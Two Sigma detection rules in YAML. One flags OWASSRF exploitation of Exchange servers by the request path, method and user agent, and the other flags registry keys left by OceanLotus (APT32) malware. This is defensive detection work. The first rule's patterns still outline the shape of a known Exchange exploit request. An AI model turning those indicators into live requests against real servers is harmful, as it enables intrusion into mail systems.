id: 92d78c63-5a5c-4c40-9b60-463810ffb082
status: test
description: Detects exploitation attempt of the OWASSRF variant targeting exchange servers using publicly available POC. It uses the OWA endpoint to access the powershell backend endpoint
references:
    - https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/
    - https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/
    - https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-12-22
modified: 2023-01-02
tags:
    - attack.initial-access
    - attack.t1190
    - detection.emerging-threats
logsource:
    category: webserver
detection:
    selection:
        # Look for the header: X-OWA-ExplicitLogonUser: owa/[email protected]
        cs-user-agent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36'
        cs-method: 'POST'
        sc-status: 200
        cs-uri-query|contains|all:
            - '/owa/mastermailbox'
            - '/powershell'
    condition: selection
falsepositives:
    - Unlikely
level: critical

title: OceanLotus Registry Activity
id: 4ac5fc44-a601-4c06-955b-309df8c4e9d4
status: test
description: Detects registry keys created in OceanLotus (also known as APT32) attacks
references:
    - https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/
    - https://github.com/eset/malware-ioc/tree/master/oceanlotus
author: megan201296, Jonhnathan Ribeiro
date: 2019-04-14
modified: 2023-09-28
tags:
    - attack.persistence
    - attack.defense-impairment
    - attack.t1112
    - detection.emerging-threats
logsource:
    category: registry_event
    product: windows
detection:
    selection_clsid:
        TargetObject|contains: '\SOFTWARE\Classes\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model'
    selection_hkcu:
        TargetObject|contains:
            # HKCU\SOFTWARE\Classes\AppXc52346ec40fb4061ad96be0e6cb7d16a\
            - 'Classes\AppXc52346ec40fb4061ad96be0e6cb7d16a\'
            # HKCU\SOFTWARE\Classes\AppX3bbba44c6cae4d9695755183472171e2\
            - 'Classes\AppX3bbba44c6cae4d9695755183472171e2\'
            # HKCU\SOFTWARE\Classes\CLSID\{E3517E26-8E93-458D-A6DF-8030BC80528B}\
            - 'Classes\CLSID\{E3517E26-8E93-458D-A6DF-8030BC80528B}\'
            - 'Classes\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model'
    selection_appx_1:
        TargetObject|contains: '\SOFTWARE\App\'
    selection_appx_2:
        TargetObject|contains:
            - 'AppXbf13d4ea2945444d8b13e2121cb6b663\'
            - 'AppX70162486c7554f7f80f481985d67586d\'
            - 'AppX37cc7fdccd644b4f85f4b22d5a3f105a\'
        TargetObject|endswith:
            - 'Application'
            - 'DefaultIcon'
    condition: selection_clsid or selection_hkcu or all of selection_appx_*
falsepositives:
    - Unknown
level: critical